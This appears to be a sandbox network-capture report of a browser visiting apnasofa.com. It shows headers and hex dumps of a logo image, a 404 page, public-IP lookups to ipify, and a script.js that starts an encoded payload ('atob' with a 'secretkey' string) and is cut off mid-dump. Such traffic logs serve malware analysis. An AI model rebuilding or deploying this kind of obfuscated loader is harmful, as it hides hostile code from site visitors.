                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://apnasofa.com/episode/index
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:34 UTC1030INHTTP/1.1 200 OK
                              Connection: close
                              cache-control: public, max-age=31536000
                              expires: Sat, 29 Nov 2025 14:58:34 GMT
                              content-type: image/png
                              last-modified: Thu, 28 Nov 2024 06:32:18 GMT
                              accept-ranges: bytes
                              content-length: 21327
                              date: Fri, 29 Nov 2024 14:58:34 GMT
                              server: LiteSpeed
                              x-xss-protection: 1; mode=block
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              strict-transport-security: max-age=31536000; includeSubDomains
                              referrer-policy: strict-origin-when-cross-origin
                              permissions-policy: geolocation=self
                              content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                              x-permitted-cross-domain-policies: none
                              feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-11-29 14:58:34 UTC338INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 4f 00 00 01 34 08 06 00 00 00 44 9d 7b b3 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 dc 49 44 41 54 78 da ec dd 4b 72 1b 49 da 20 5a af b2 1c 37 d5 2b 20 ea 6e 80 ac 15 10 39 e9 1e 92 35 6f 33 22 57 20 a6 71 01 82 16 40 4b e6 0a 14 32 eb 79 51 c3 be 93 04 57 50 e4 06 ba c0 15 94 78 37 f0 df 70 d0 91 82 28 3e 40 12 08 77 8f 38 c7 2c 0c 59 59 29 21 e0 8f 08 77 ff fc 11 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 7f 79 ea ff fc ff 8e fe 9f f3 f6 63 5f 32 f1 52 ff ed e2 ff 8e 5f f3 e7 3e fc bf 61 d2 7e 4c a4 20 af d0
                              Data Ascii: PNGIHDRO4D{pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<RIDATxKrI Z7+ n95o3"W q@K2yQWPx7p(>@w8,YY)!w7yc_2R_>a~L
                              2024-11-29 14:58:34 UTC14994INData Raw: 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00 00 00 00 00 82 e0 29 00 00 00 00 00 00 c0 82 e0 29 00 00 00 00 00 00 40 10 3c 05 00 00 00 00 00 00 58 10 3c 05 00 00 00 00 00 00 08 82 a7 00 00 00 00 00 00 00 0b 82 a7 00 00 00 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00
                              Data Ascii: A`A ,SS x xOO))@<X<A`A ,SS x xOO
                              2024-11-29 14:58:34 UTC5995INData Raw: dd 7a 7f 92 b3 bc a4 5d b1 e8 a6 4d f6 ae 84 67 c4 3a 79 2e 78 0a 00 6f d7 b7 40 e3 6d 30 b8 43 47 d2 39 76 a5 0c 82 37 72 84 02 95 f0 3c de 4b b3 c1 87 62 2a df 8b 7e 6f 7c ed c1 f3 7a 56 c0 3d c4 01 d8 21 4d 8c 98 a8 d7 14 cc f1 11 f4 c6 40 ce 8d cf d9 87 9d f6 6d f2 53 9a e0 74 38 f0 76 d9 90 9c 84 bc ab 8c d7 ce 73 c1 53 00 78 a3 b4 fd d6 75 8f 7e d2 85 ad 02 e9 ba cc 15 72 1f 07 6d c7 ed 44 76 a0 7e 3c 68 10 3b 12 a4 55 a7 07 99 6f e3 da ec f7 67 35 ea f5 46 0c 62 f5 69 1a 94 cd fd 7e bf 4d 13 c6 e0 21 82 a7 f4 49 15 db 71 be 45 e6 1d c8 76 43 ff 26 3f 4d b5 cb 86 a1 90 36 d9 da 79 2e 78 0a 00 9b 71 ee b7 40 2f 3a 2b 53 db f7 52 92 34 41 e7 a6 80 5b 89 67 9f 4e 07 90 e4 25 fc c6 46 c9 af a6 5e bc f6 fe 73 9e 97 b6 6a 28 67 7e 4f 43 fe 15 0e 06 66 79
                              Data Ascii: z]Mg:y.xo@m0CG9v7r<Kb*~o|zV=!M@mSt8vsSxu~rmDv~<h;Uog5Fbi~M!IqEvC&?M6y.xq@/:+SR4A[gN%F^sj(g~OCfy


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.449753103.160.107.1384435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:33 UTC539OUTGET /episode/script.js HTTP/1.1
                              Host: apnasofa.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: script
                              Referer: https://apnasofa.com/episode/index
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:34 UTC1066INHTTP/1.1 200 OK
                              Connection: close
                              cache-control: public, max-age=2592000
                              expires: Sun, 29 Dec 2024 14:58:34 GMT
                              content-type: text/javascript
                              last-modified: Thu, 28 Nov 2024 14:11:15 GMT
                              accept-ranges: bytes
                              content-length: 8831
                              date: Fri, 29 Nov 2024 14:58:34 GMT
                              server: LiteSpeed
                              x-xss-protection: 1; mode=block
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              strict-transport-security: max-age=31536000; includeSubDomains
                              referrer-policy: strict-origin-when-cross-origin
                              permissions-policy: geolocation=self
                              content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                              x-permitted-cross-domain-policies: none
                              feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                              access-control-allow-origin: *
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-11-29 14:58:34 UTC302INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 73 63 72 69 70 74 20 3d 20 61 74 6f 62 28 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 55 50 46 78 46 55 43 68 41 4e 48 41 49 52 45 77 63 57 44 67 45 38 48 67 51 4b 48 6b 56 4a 53 30 4a 65 53 47 39 44 55 67 59 62 42 52 59 4e 55 77 77 51 50 77 6f 57 41 67 6b 63 55 31 68 44 58 51 77 6b 41 77 6f 58 46 68 6b 4b 49 67 51 51 46 77 77 70 48 41 45 66 4d 77 73 51 47 51 6f 51 46 30 6f 4b 58 42 45 52 47 42 46 52 48 51 51 56 47 77 49 56 48 77 6f 4c 58 52 41 51 46 78 63 31 44 41 41 58 42 30 78 59 65 47 39 55 53
                              Data Ascii: var key = "secretkey";var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US
                              2024-11-29 14:58:34 UTC8529INData Raw: 42 41 74 5a 46 41 41 58 4e 77 67 56 41 67 6b 2f 41 51 6f 4f 4a 7a 63 34 51 30 78 5a 43 47 39 44 55 6b 56 55 53 30 55 61 48 41 73 51 42 6b 55 63 43 68 59 52 55 31 68 44 42 51 77 61 44 77 6f 4f 58 51 6b 4d 45 51 51 41 41 67 6f 58 58 51 30 43 41 51 31 61 47 42 41 62 41 42 45 52 47 77 73 54 51 31 52 51 53 47 39 44 55 6b 56 55 53 30 55 51 46 55 56 4c 55 77 30 56 47 41 31 51 55 78 63 47 42 68 41 47 42 55 56 65 56 46 35 70 55 6b 56 55 53 30 56 5a 42 78 63 61 55 68 35 2b 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 63 63 42 78 41 52 48 45 55 56 48 77 6f 62 57 77 30 43 41 51 31 64 55 47 39 5a 55 30 56 44 55 6b 55 4a 53 77 59 59 42 77 59 4c 55 6b 30 52 51 6b 55 43 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 55 52 46 78 45 42 47 51 74 5a 56 45 4a 59 65 45 56 55 53 30 56
                              Data Ascii: BAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0V


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.449756104.26.12.2054435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:35 UTC547OUTGET /?format=json HTTP/1.1
                              Host: api.ipify.org
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: */*
                              Origin: https://apnasofa.com
                              Sec-Fetch-Site: cross-site
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Referer: https://apnasofa.com/
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:36 UTC462INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:58:36 GMT
                              Content-Type: application/json
                              Content-Length: 21
                              Connection: close
                              Access-Control-Allow-Origin: *
                              Vary: Origin
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              CF-RAY: 8ea374f00fecf5f8-EWR
                              server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1651&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1125&delivery_rate=1757977&cwnd=32&unsent_bytes=0&cid=e618ae79ba9cb942&ts=501&x=0"
                              2024-11-29 14:58:36 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
                              Data Ascii: {"ip":"8.46.123.228"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.449758103.160.107.1384435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:36 UTC353OUTGET /episode/script.js HTTP/1.1
                              Host: apnasofa.com
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:37 UTC1066INHTTP/1.1 200 OK
                              Connection: close
                              cache-control: public, max-age=2592000
                              expires: Sun, 29 Dec 2024 14:58:37 GMT
                              content-type: text/javascript
                              last-modified: Thu, 28 Nov 2024 14:11:15 GMT
                              accept-ranges: bytes
                              content-length: 8831
                              date: Fri, 29 Nov 2024 14:58:37 GMT
                              server: LiteSpeed
                              x-xss-protection: 1; mode=block
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              strict-transport-security: max-age=31536000; includeSubDomains
                              referrer-policy: strict-origin-when-cross-origin
                              permissions-policy: geolocation=self
                              content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                              x-permitted-cross-domain-policies: none
                              feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                              access-control-allow-origin: *
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-11-29 14:58:37 UTC302INData Raw: 76 61 72 20 6b 65 79 20 3d 20 22 73 65 63 72 65 74 6b 65 79 22 3b 0a 76 61 72 20 73 63 72 69 70 74 20 3d 20 61 74 6f 62 28 22 46 77 6f 41 42 77 67 52 42 52 46 58 45 67 45 48 4e 78 4d 52 42 52 45 31 47 68 59 58 46 77 73 52 47 55 31 65 4e 79 6f 75 4d 51 6f 61 48 77 41 58 42 79 6b 4d 45 77 45 52 44 30 4a 56 55 30 31 4b 55 6c 68 4b 53 78 35 7a 55 30 55 50 46 78 46 55 43 68 41 4e 48 41 49 52 45 77 63 57 44 67 45 38 48 67 51 4b 48 6b 56 4a 53 30 4a 65 53 47 39 44 55 67 59 62 42 52 59 4e 55 77 77 51 50 77 6f 57 41 67 6b 63 55 31 68 44 58 51 77 6b 41 77 6f 58 46 68 6b 4b 49 67 51 51 46 77 77 70 48 41 45 66 4d 77 73 51 47 51 6f 51 46 30 6f 4b 58 42 45 52 47 42 46 52 48 51 51 56 47 77 49 56 48 77 6f 4c 58 52 41 51 46 78 63 31 44 41 41 58 42 30 78 59 65 47 39 55 53
                              Data Ascii: var key = "secretkey";var script = atob("FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0UPFxFUChANHAIREwcWDgE8HgQKHkVJS0JeSG9DUgYbBRYNUwwQPwoWAgkcU1hDXQwkAwoXFhkKIgQQFwwpHAEfMwsQGQoQF0oKXBERGBFRHQQVGwIVHwoLXRAQFxc1DAAXB0xYeG9US
                              2024-11-29 14:58:37 UTC8529INData Raw: 42 41 74 5a 46 41 41 58 4e 77 67 56 41 67 6b 2f 41 51 6f 4f 4a 7a 63 34 51 30 78 5a 43 47 39 44 55 6b 56 55 53 30 55 61 48 41 73 51 42 6b 55 63 43 68 59 52 55 31 68 44 42 51 77 61 44 77 6f 4f 58 51 6b 4d 45 51 51 41 41 67 6f 58 58 51 30 43 41 51 31 61 47 42 41 62 41 42 45 52 47 77 73 54 51 31 52 51 53 47 39 44 55 6b 56 55 53 30 55 51 46 55 56 4c 55 77 30 56 47 41 31 51 55 78 63 47 42 68 41 47 42 55 56 65 56 46 35 70 55 6b 56 55 53 30 56 5a 42 78 63 61 55 68 35 2b 53 30 56 5a 55 30 56 44 55 6b 56 55 53 78 63 63 42 78 41 52 48 45 55 56 48 77 6f 62 57 77 30 43 41 51 31 64 55 47 39 5a 55 30 56 44 55 6b 55 4a 53 77 59 59 42 77 59 4c 55 6b 30 52 51 6b 55 43 65 55 56 44 55 6b 56 55 53 30 56 5a 55 30 55 52 46 78 45 42 47 51 74 5a 56 45 4a 59 65 45 56 55 53 30 56
                              Data Ascii: BAtZFAAXNwgVAgk/AQoOJzc4Q0xZCG9DUkVUS0UaHAsQBkUcChYRU1hDBQwaDwoOXQkMEQQAAgoXXQ0CAQ1aGBAbABERGwsTQ1RQSG9DUkVUS0UQFUVLUw0VGA1QUxcGBhAGBUVeVF5pUkVUS0VZBxcaUh5+S0VZU0VDUkVUSxccBxARHEUVHwobWw0CAQ1dUG9ZU0VDUkUJSwYYBwYLUk0RQkUCeUVDUkVUS0VZU0URFxEBGQtZVEJYeEVUS0V


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.449759103.160.107.1384435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:36 UTC593OUTGET /favicon.ico HTTP/1.1
                              Host: apnasofa.com
                              Connection: keep-alive
                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                              sec-ch-ua-mobile: ?0
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              sec-ch-ua-platform: "Windows"
                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                              Sec-Fetch-Site: same-origin
                              Sec-Fetch-Mode: no-cors
                              Sec-Fetch-Dest: image
                              Referer: https://apnasofa.com/episode/index
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:37 UTC416INHTTP/1.1 404 Not Found
                              Connection: close
                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                              pragma: no-cache
                              content-type: text/html
                              content-length: 1251
                              date: Fri, 29 Nov 2024 14:58:37 GMT
                              server: LiteSpeed
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-11-29 14:58:37 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                              2024-11-29 14:58:37 UTC299INData Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
                              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.449760103.160.107.1384435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:36 UTC358OUTGET /episode/image/logo.png HTTP/1.1
                              Host: apnasofa.com
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:37 UTC1030INHTTP/1.1 200 OK
                              Connection: close
                              cache-control: public, max-age=31536000
                              expires: Sat, 29 Nov 2025 14:58:37 GMT
                              content-type: image/png
                              last-modified: Thu, 28 Nov 2024 06:32:18 GMT
                              accept-ranges: bytes
                              content-length: 21327
                              date: Fri, 29 Nov 2024 14:58:37 GMT
                              server: LiteSpeed
                              x-xss-protection: 1; mode=block
                              x-frame-options: SAMEORIGIN
                              x-content-type-options: nosniff
                              strict-transport-security: max-age=31536000; includeSubDomains
                              referrer-policy: strict-origin-when-cross-origin
                              permissions-policy: geolocation=self
                              content-security-policy: default-src 'self' https: data: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: https: *;
                              x-permitted-cross-domain-policies: none
                              feature-policy: camera 'none'; microphone 'none'; geolocation 'self'
                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                              2024-11-29 14:58:37 UTC338INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 07 4f 00 00 01 34 08 06 00 00 00 44 9d 7b b3 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 52 dc 49 44 41 54 78 da ec dd 4b 72 1b 49 da 20 5a af b2 1c 37 d5 2b 20 ea 6e 80 ac 15 10 39 e9 1e 92 35 6f 33 22 57 20 a6 71 01 82 16 40 4b e6 0a 14 32 eb 79 51 c3 be 93 04 57 50 e4 06 ba c0 15 94 78 37 f0 df 70 d0 91 82 28 3e 40 12 08 77 8f 38 c7 2c 0c 59 59 29 21 e0 8f 08 77 ff fc 11 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 37 7f 79 ea ff fc ff 8e fe 9f f3 f6 63 5f 32 f1 52 ff ed e2 ff 8e 5f f3 e7 3e fc bf 61 d2 7e 4c a4 20 af d0
                              Data Ascii: PNGIHDRO4D{pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<RIDATxKrI Z7+ n95o3"W q@K2yQWPx7p(>@w8,YY)!w7yc_2R_>a~L
                              2024-11-29 14:58:37 UTC14994INData Raw: 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00 00 00 00 00 82 e0 29 00 00 00 00 00 00 c0 82 e0 29 00 00 00 00 00 00 40 10 3c 05 00 00 00 00 00 00 58 10 3c 05 00 00 00 00 00 00 08 82 a7 00 00 00 00 00 00 00 0b 82 a7 00 00 00 00 00 00 00 41 f0 14 00 00 00 00 00 00 60 41 f0 14 00 00 00 00 00 00 20 08 9e 02 00 00 00 00 00 00 2c 08 9e 02 00 00 00 00 00 00 04 c1 53 00 00 00 00 00 00 80 05 c1 53 00 00 00 00 00 00 80 20 78 0a 00 00 00 00 00 00 b0 20 78 0a 00 00 00 00 00 00 10 04 4f 01 00 00 00 00 00 00 16 04 4f 01 00 00
                              Data Ascii: A`A ,SS x xOO))@<X<A`A ,SS x xOO
                              2024-11-29 14:58:37 UTC5995INData Raw: dd 7a 7f 92 b3 bc a4 5d b1 e8 a6 4d f6 ae 84 67 c4 3a 79 2e 78 0a 00 6f d7 b7 40 e3 6d 30 b8 43 47 d2 39 76 a5 0c 82 37 72 84 02 95 f0 3c de 4b b3 c1 87 62 2a df 8b 7e 6f 7c ed c1 f3 7a 56 c0 3d c4 01 d8 21 4d 8c 98 a8 d7 14 cc f1 11 f4 c6 40 ce 8d cf d9 87 9d f6 6d f2 53 9a e0 74 38 f0 76 d9 90 9c 84 bc ab 8c d7 ce 73 c1 53 00 78 a3 b4 fd d6 75 8f 7e d2 85 ad 02 e9 ba cc 15 72 1f 07 6d c7 ed 44 76 a0 7e 3c 68 10 3b 12 a4 55 a7 07 99 6f e3 da ec f7 67 35 ea f5 46 0c 62 f5 69 1a 94 cd fd 7e bf 4d 13 c6 e0 21 82 a7 f4 49 15 db 71 be 45 e6 1d c8 76 43 ff 26 3f 4d b5 cb 86 a1 90 36 d9 da 79 2e 78 0a 00 9b 71 ee b7 40 2f 3a 2b 53 db f7 52 92 34 41 e7 a6 80 5b 89 67 9f 4e 07 90 e4 25 fc c6 46 c9 af a6 5e bc f6 fe 73 9e 97 b6 6a 28 67 7e 4f 43 fe 15 0e 06 66 79
                              Data Ascii: z]Mg:y.xo@m0CG9v7r<Kb*~o|zV=!M@mSt8vsSxu~rmDv~<h;Uog5Fbi~M!IqEvC&?M6y.xq@/:+SR4A[gN%F^sj(g~OCfy


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.449761104.26.13.2054435324C:\Program Files\Google\Chrome\Application\chrome.exe
                              TimestampBytes transferredDirectionData
                              2024-11-29 14:58:37 UTC349OUTGET /?format=json HTTP/1.1
                              Host: api.ipify.org
                              Connection: keep-alive
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                              Accept: */*
                              Sec-Fetch-Site: none
                              Sec-Fetch-Mode: cors
                              Sec-Fetch-Dest: empty
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US,en;q=0.9
                              2024-11-29 14:58:38 UTC431INHTTP/1.1 200 OK
                              Date: Fri, 29 Nov 2024 14:58:38 GMT
                              Content-Type: application/json
                              Content-Length: 21
                              Connection: close
                              Vary: Origin
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              CF-RAY: 8ea374fb9bb07d06-EWR
                              server-timing: cfL4;desc="?proto=TCP&rtt=7041&min_rtt=2759&rtt_var=3859&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=927&delivery_rate=1058354&cwnd=244&unsent_bytes=0&cid=96ffdd84a52856d0&ts=471&x=0"
                              2024-11-29 14:58:38 UTC21INData Raw: 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d
